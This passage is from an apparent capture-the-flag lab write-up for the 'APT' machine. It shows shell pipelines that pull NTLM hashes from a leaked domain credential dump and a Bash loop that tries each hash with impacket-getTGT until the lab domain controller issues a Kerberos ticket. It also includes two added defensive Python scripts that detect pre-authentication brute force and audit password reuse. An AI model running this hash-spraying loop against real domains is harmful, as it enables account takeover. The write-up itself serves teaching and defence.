Brute-Force Hash


The backup archive found in one of the target SMB shares, accessible by anyone, holds a vital set of files that contains the entire domain credentials. While those files appeared to be outdated from the testing as only a single domain user is validated, it is still possible to make use of those hash strings by leveraging them for a Brute-Force attack.

┌──(kali㉿kali)-[~/…/labs/apt/smb/hashdump]
└─$ cat htb.local.ntds | cut -d ':' -f3-4 | tr -d '[:blank:]' > ntlm_hashes.txt
 
┌──(kali㉿kali)-[~/…/labs/apt/smb/hashdump]
└─$ cat htb.local.ntds.kerberos | grep 'aes256' | cut -d ':' -f3 | tr -d '[:blank:]' > kerberos_hashes.txt

I first create two files that contain only the NTLM hashes and the Kerberos AES keys extracted from the credential dump.

NTLM (Fail)


While there are many tools that support NTLM authentication, I will start with crackmapexec.

Attempting a brute-force attack against the henry.vinson user fails. The connection error indicates that there may be a brute-force mitigation in place that blocks the attempt.

While this may be the case for direct NTLM authentication, I can try Kerberos authentication instead.

Although crackmapexec supports Kerberos authentication with the -k flag, I will instead explore other tool options below.

Kerberos (Success)


While the majority of Impacket tools support supplying either NTLM hashes or an AES key for Kerberos authentication, they do not support reading candidates from a file for a brute-force attack. However, this is easily resolved with a short script.

#!/bin/bash
# Try each LM:NT hash pair from the dump as the Kerberos key for henry.vinson.
# A request that the KDC accepts writes a .ccache file for the user.
 
ipv6=dead:beef::b885:d62a:d679:573f
hashes=/home/kali/archive/htb/labs/apt/smb/hashdump/ntlm_hashes.txt
 
while read -r hash; do
    echo "Testing $hash ..."
    # -k selects Kerberos authentication; -hashes supplies the LM:NT pair.
    # The variable name here must match the one assigned above ($ipv6).
    /usr/bin/impacket-getTGT htb.local/henry.vinson@apt.htb.local -no-pass -k -hashes "$hash" -dc-ip "$ipv6"
done < "$hashes"

The Bash script above reads each NTLM hash from the ntlm_hashes.txt file and attempts to obtain a TGT for the henry.vinson user via Kerberos authentication (-k). impacket-getTGT is an excellent tool for this purpose, as the generated TGT can be reused for subsequent operations with better OPSEC.

┌──(kali㉿kali)-[~/…/labs/apt/smb/hashdump]
└─$ ./brute-force_hash.sh 
 
[...REDACTED...]
 
testing aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb ...
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Saving ticket in henry.vinson@apt.htb.local.ccache

After a while, the matching NTLM hash for the henry.vinson user was found: aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb. I also tried the aesKey (Kerberos secret) over Kerberos authentication, to no avail.
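The reason the Kerberos path worked where NTLM was blocked is also where a defender should look: every AS-REQ made with a wrong key is logged on the domain controller as event 4771 (Kerberos pre-authentication failed, failure code 0x18), and the first request with the right key is logged as 4768 (TGT requested). A burst of 4771 for one account from one client, followed by a 4768 from the same client, is the trace a hash-by-hash TGT attempt leaves behind. The following Python script is an added detection example, not code from the write-up; the simplified "timestamp id key=value" event format, the client addresses, the jane.doe account and the threshold are assumptions, and the sample events are constructed.

```python
"""Flag Kerberos pre-authentication brute force in domain controller events.

Every AS-REQ made with a wrong key produces event 4771 (pre-authentication
failed, failure code 0x18) on the DC; the first one made with the right key
produces 4768 (TGT requested). Many 4771 for one account from one client
inside a short window, followed by a 4768 from that client, is the trace
left by trying hashes one at a time against the KDC.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in a simplified "timestamp id key=value ..." form,
# not real DC logs; client addresses and jane.doe are invented.
SAMPLE_LOG = "\n".join(
    [f"2024-03-01T08:00:{i:02d}Z 4771 account=henry.vinson client=fd00::10 status=0x18"
     for i in range(12)]
    + [
        "2024-03-01T08:00:13Z 4768 account=henry.vinson client=fd00::10 status=0x0",
        "2024-03-01T08:05:00Z 4771 account=jane.doe client=fd00::20 status=0x18",
        "2024-03-01T08:05:05Z 4768 account=jane.doe client=fd00::20 status=0x0",
    ]
)


def parse_events(text):
    """Parse the simplified event lines into dicts with a datetime timestamp."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        ev = {"ts": datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ"), "id": parts[1]}
        ev.update(p.split("=", 1) for p in parts[2:] if "=" in p)
        events.append(ev)
    return events


def detect_preauth_bruteforce(events, threshold=10, window=timedelta(minutes=5)):
    """Return {(account, client): {"failures": n, "success_after": bool}} for
    every account/client pair with at least `threshold` pre-auth failures
    inside `window`. success_after records whether a 4768 followed the burst."""
    recent = defaultdict(list)   # (account, client) -> 4771 timestamps still in window
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev.get("account"), ev.get("client"))
        if ev["id"] == "4771" and ev.get("status") == "0x18":
            hits = recent[key]
            hits.append(ev["ts"])
            # Slide the window: forget failures older than `window`.
            while hits and ev["ts"] - hits[0] > window:
                hits.pop(0)
            if len(hits) >= threshold:
                alert = alerts.setdefault(key, {"failures": 0, "success_after": False})
                alert["failures"] = max(alert["failures"], len(hits))
        elif ev["id"] == "4768" and key in alerts:
            alerts[key]["success_after"] = True
    return alerts


if __name__ == "__main__":
    for (account, client), info in detect_preauth_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(f"{account} from {client}: {info['failures']} pre-auth failures, "
              f"TGT issued afterwards: {info['success_after']}")
```

A single 4771 followed by a 4768 (jane.doe in the sample) is an ordinary typo and produces no alert; the henry.vinson burst crosses the threshold and is marked as followed by a successful TGT request, which is the case worth escalating.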

Additionally, the NTLM hash belonged to the aine.stafford user, who no longer appeared to be valid. Although the relationship between these two users could not be identified at this point, it is clear that there is password reuse.
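The reuse observed here (the hash that unlocked henry.vinson belonged to aine.stafford) is something a defender can find before an attacker does by auditing an NTDS export for NT hashes shared by more than one account, which is also how the hash extraction at the top of this section could be turned into a password-quality check. The Python script below is an added example and not part of the write-up; it parses the Impacket secretsdump line format (domain\user:rid:lmhash:nthash:::) from constructed sample lines whose hashes are placeholders, and the account names other than henry.vinson and aine.stafford, together with all RIDs, are invented.

```python
"""Audit a secretsdump-style NTDS export for password reuse across accounts.

Lines have the form  domain\\user:rid:lmhash:nthash:::  (Impacket format).
Accounts with the same NT hash share the same password.
"""
from collections import defaultdict

# LM hash Windows stores when LM hashing is disabled (the usual case).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed sample export: the hashes are placeholders, not real values.
SAMPLE_NTDS = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
htb.local\henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
htb.local\henry.vinson_history0:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
htb.local\aine.stafford:1106:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
htb.local\APT$:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
htb.local\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
htb.local\legacy.user:1108:1122334455667788aabbccddeeff0011:99887766554433221100ffeeddccbbaa:::
"""


def parse_ntds(lines):
    """Return one dict per credential line; banners and malformed lines are skipped."""
    records = []
    for line in lines:
        line = line.strip()
        if line.count(":") < 3:
            continue
        account, rid, lm, nt = line.split(":")[:4]
        if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
            continue
        user = account.split("\\", 1)[-1]   # drop the domain prefix
        records.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return records


def find_reused_hashes(records):
    """Map each NT hash used by more than one account to the list of those accounts.
    Machine accounts (trailing $) and password-history rows are ignored so they
    do not produce false reuse findings."""
    by_hash = defaultdict(list)
    for r in records:
        if r["user"].endswith("$") or "_history" in r["user"]:
            continue
        by_hash[r["nt"]].append(r["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def find_lm_hashes(records):
    """Accounts whose LM hash is not the empty-password constant: their
    password is also stored in the far weaker LM form."""
    return [r["user"] for r in records if r["lm"] != EMPTY_LM]


if __name__ == "__main__":
    recs = parse_ntds(SAMPLE_NTDS.splitlines())
    for h, users in find_reused_hashes(recs).items():
        print(f"NT hash {h[:8]}... shared by: {', '.join(users)}")
    for user in find_lm_hashes(recs):
        print(f"LM hash present for {user}")
```

Run against a real export, the shared-hash groups are the accounts to reset first, and any account that still carries a reused hash of a disabled or stale user (the aine.stafford case above) shows that disabling the old account did not retire the password.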

Now that I have a valid domain credential, I can finally start digging deeper.